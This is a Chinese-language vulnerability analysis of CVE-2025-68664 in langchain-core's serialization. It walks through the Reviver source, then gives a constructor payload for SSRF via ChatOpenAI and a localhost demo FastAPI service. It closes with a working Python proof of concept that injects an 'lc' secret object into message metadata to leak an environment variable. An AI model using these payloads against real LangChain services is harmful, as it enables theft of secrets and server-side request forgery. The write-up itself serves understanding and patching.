langchain序列化 CVE-2025-68664

影响版本

langchain-core < 0.3.81

langchain-core >= 1.0.0 且 < 1.2.5

概要

具体位于这里

from langchain_core.load import dumps, dumpd, load, loads

dumps()dumpd()函数在处理字典对象时没有对lc这个键进行转义

这个键属于内部保留键,如果用户手动添加这个键值,就能伪造成内部的操作

实现窃取环境变量等操作

调试分析/源码逻辑

从loads开始调试

可以清楚的看到经过dumpd()函数的字典中的lc键并没有被转义

步入进beta()装饰器,这个不重要,在return回外部时步入即可

进入loads()函数本身:

@beta()
def loads(
text: str,
*,
secrets_map: Optional[dict[str, str]] = None,
valid_namespaces: Optional[list[str]] = None,
secrets_from_env: bool = True,
additional_import_mappings: Optional[dict[tuple[str, ...], tuple[str, ...]]] = None,
ignore_unserializable_fields: bool = False,
) -> Any:

return json.loads(
text,
object_hook=Reviver(
secrets_map,
valid_namespaces,
secrets_from_env,
additional_import_mappings,
ignore_unserializable_fields=ignore_unserializable_fields,
),
)

loads函数中是一个json.loads函数的操作

第一个参数代表需要加载成json(字典)的json格式字符串,

第二个object_hook是一个可执行对象,会接收text转换出的jjson对象并进行处理

可以简单写一个脚本测试一下这个过程:

import json

obj_text = "{\"a\": 123, \"b\": 1234}"

class Test:
def __init__(self, a, b):
self.a = a
self.b = b

def __repr__(self):
return f"<Test a={self.a} b={self.b}>"

def user_decoder(d):
if 'a' in d and 'b' in d:
return Test(d['a'], d['b'])
return d

print(json.loads(obj_text,object_hook=user_decoder))
# <Test a=123 b=1234>

不过注意object_hook需要是一个可执行对象,而不是只能是函数

所以传入实现了__call__魔术方法的类的实例化对象,

或实现了__init__构造函数的类都是可行的

所以回到loads函数中的这一段代码:

return json.loads(
text,
object_hook=Reviver(
secrets_map,
valid_namespaces,
secrets_from_env,
additional_import_mappings,
ignore_unserializable_fields=ignore_unserializable_fields,
),
)

这里已经主动实例化了Reviver的对象,

所以object_hook实际上是Reviver__call__方法,

我们步入json.loads的过程之间也可以看到这个方法:

经过Reviver的过程后我们原本的字典对象就直接变为了读取出来的环境变量:

我们直接在需要看的__call__方法的位置下断点

就成功找到了在环境变量中读取的过程了:

此处的os.environ包含了python程序运行时从系统环境变量中拷贝过来的变量

还有在程序中手动设置的变量

再完整看一下源码,逻辑还是很好懂的:

def __call__(self, value: dict[str, Any]) -> Any:
if (
value.get("lc") == 1
and value.get("type") == "secret"
and value.get("id") is not None
):
[key] = value["id"]
if key in self.secrets_map:
return self.secrets_map[key]
if self.secrets_from_env and key in os.environ and os.environ[key]:
return os.environ[key]
return None

if (
value.get("lc") == 1
and value.get("type") == "not_implemented"
and value.get("id") is not None
):
if self.ignore_unserializable_fields:
return None
msg = (
"Trying to load an object that doesn't implement "
f"serialization: {value}"
)
raise NotImplementedError(msg)

if (
value.get("lc") == 1
and value.get("type") == "constructor"
and value.get("id") is not None
):
[*namespace, name] = value["id"]
mapping_key = tuple(value["id"])

if (
namespace[0] not in self.valid_namespaces
# The root namespace ["langchain"] is not a valid identifier.
or namespace == ["langchain"]
):
msg = f"Invalid namespace: {value}"
raise ValueError(msg)
# Has explicit import path.
if mapping_key in self.import_mappings:
import_path = self.import_mappings[mapping_key]
# Split into module and name
import_dir, name = import_path[:-1], import_path[-1]
# Import module
mod = importlib.import_module(".".join(import_dir))
elif namespace[0] in DISALLOW_LOAD_FROM_PATH:
msg = (
"Trying to deserialize something that cannot "
"be deserialized in current version of langchain-core: "
f"{mapping_key}."
)
raise ValueError(msg)
# Otherwise, treat namespace as path.
else:
mod = importlib.import_module(".".join(namespace))

cls = getattr(mod, name)

# The class must be a subclass of Serializable.
if not issubclass(cls, Serializable):
msg = f"Invalid namespace: {value}"
raise ValueError(msg)

# We don't need to recurse on kwargs
# as json.loads will do that for us.
kwargs = value.get("kwargs", {})
return cls(**kwargs)

return value

注意到还有两个我们没有使用过的type

其中not_implemented是用作容错的,没有什么作用

constructor就相等有意思了,可以实例化langchain白名单中的类

白名单默认为这些:

DEFAULT_NAMESPACES = [
"langchain",
"langchain_core",
"langchain_community",
"langchain_anthropic",
"langchain_groq",
"langchain_google_genai",
"langchain_aws",
"langchain_openai",
"langchain_google_vertexai",
"langchain_mistralai",
"langchain_fireworks",
"langchain_xai",
"langchain_sambanova",
"langchain_perplexity",
]

最好用的是langchain_community,里面有大量的工具可以执行代码,读取文件,打SSRF等

可惜的是他在黑名单里:

DISALLOW_LOAD_FROM_PATH = [
"langchain_community",
"langchain",
]

别的利用可能稍微有限些,例如如果想要利用langchain_openaissrf

构造payload:

{
"lc": 1,
"type": "constructor",
"id": ["langchain_openai", "chat_models", "base", "ChatOpenAI"],
"kwargs": {
"openai_api_key": "sk-ssrf-test-key",
"base_url": "http://127.0.0.1:8080",
"max_retries": 1,
"temperature": 0
}
}

实例化的过程不触发请求,

而是需要目标服务中额外调用langchain_openai实例化对象的invoke方法

肯定不会主动写这种逻辑的:

restored_obj = loads(json_str)
response = restored_obj.invoke("Hello, are you there?")

不过如果确实这么写了是能收到请求/响应

<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
127.0.0.1 - - [03/Jan/2026 19:14:40] "POST /chat/completions HTTP/1.1" 404 -

实际场景复现

在这个漏洞的实际利用中,我们肯定没法直接调用目标服务的loads函数

取决于不同服务何时主动调用loads

例如这个服务:

import json
import os
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
from typing import Any, Dict, List

from langchain_core.messages import HumanMessage, AIMessage
from langchain_core.load import dumpd, load

app = FastAPI()

DB_FILE = "chat_history.json"

if not os.path.exists(DB_FILE):
with open(DB_FILE, "w") as f:
json.dump([], f)

class ChatInput(BaseModel):
message: str
metadata: Dict[str, Any] = {}

@app.post("/send_message")
def send_message(chat_input: ChatInput):
msg = HumanMessage(content=chat_input.message, additional_kwargs=chat_input.metadata)

serialized_msg = dumpd(msg)

with open(DB_FILE, "r+") as f:
history = json.load(f)
history.append(serialized_msg)
f.seek(0)
json.dump(history, f)

return {"status": "Message saved", "serialized_data": serialized_msg}

@app.get("/get_history")
def get_history():
try:
with open(DB_FILE, "r") as f:
history_data = json.load(f)

restored_messages = []
for item in history_data:
obj = load(item)
restored_messages.append(obj)

return {"history": str(restored_messages)}
except Exception as e:
return {"error": str(e), "message": "反序列化失败"}


os.environ["API_SECRET"] = "Flag{Real_World_Attack_Success}"

if __name__ == "__main__":
import uvicorn
print("[*] 服务端启动中...")
print("[*] 目标机密: API_SECRET")
uvicorn.run(app, host="127.0.0.1", port=8000)

我们可以就可以利用刚刚的漏洞编写出这个poc完成攻击

import requests
import json

url = "http://127.0.0.1:8000/send_message"

payload = {
"message": "你好,这是一条普通的消息",
"metadata": {
"my_hack": {
"lc": 1,
"type": "secret",
"id": ["API_SECRET"]
}
}
}

print("[*] 1. 发送恶意消息 (埋雷)...")
response = requests.post(url, json=payload)
print(f"服务器响应: {response.json()}")

print("\n[*] 2. 触发读取历史 (引爆)...")
trigger_url = "http://127.0.0.1:8000/get_history"
trigger_response = requests.get(trigger_url)

print("[-] 服务器返回的历史记录:")

print(trigger_response.text)